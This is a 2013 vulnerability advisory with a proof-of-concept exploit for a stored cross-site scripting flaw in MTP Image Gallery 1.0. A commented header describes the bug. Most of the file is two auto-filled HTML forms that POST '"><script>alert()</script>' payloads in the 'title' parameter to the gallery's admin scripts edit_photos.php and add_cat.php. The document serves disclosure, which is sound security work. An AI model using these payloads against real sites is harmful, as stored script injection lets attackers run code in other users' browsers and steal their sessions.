?<!--
MTP Image Gallery 1.0 (title) Remote Script Insertion Vulnerability
Vendor: MTP Scripts
Product web page: http://www.morephp.net
Affected version: 1.0
Summary: MTP Image Gallery offers more control, better
uploading and enhanced performance. With MTP Image Gallery
you can easily create and maintain albums of photos via an
intuitive, web interface.
Desc: MTP Image Gallery suffers from a stored XSS vulnerability
when parsing user input to the 'title' parameter via POST method
thru 'edit_photos.php' and 'add_cat.php' scripts. Attackers can
exploit this weakness to execute arbitrary HTML and script code
in a user's browser session.
Tested on: Linux, Apache2
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2013-5130
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2013-5130.php
17.02.2013
-->
<html>
<head>
<title>MTP Image Gallery 1.0 (title) Remote Script Insertion Vulnerability</title>
</head>
<body><center>
<form method="POST" action="http://localhost/gallery/admin/edit_photos.php?ID=39&action=edit">
<input type="hidden" name="title" value='"><script>alert(1);</script>' />
<input type="hidden" name="Filedata" value="" />
<input type="hidden" name="cats" value="12" />
<input type="hidden" name="status" value="1" />
<input type="hidden" name="full" value="1" />
<input type="hidden" name="views" value="1" />
<input type="hidden" name="rating" value="1" />
<input type="hidden" name="author" value="lqwrm" />
<input type="hidden" name="action" value="add" />
<input type="submit" value="XSS #1" />
</form>
<br /><br />
<form method="POST" action="http://localhost/gallery/admin/add_cat.php">
<input type="hidden" name="action" value="add" />
<input type="hidden" name="cats" value="1" />
<input type="hidden" name="full" value="1" />
<input type="hidden" name="title" value='"><script>alert(2);</script>' />
<input type="submit" value="XSS #2" />
</form>
</center></body>
</html>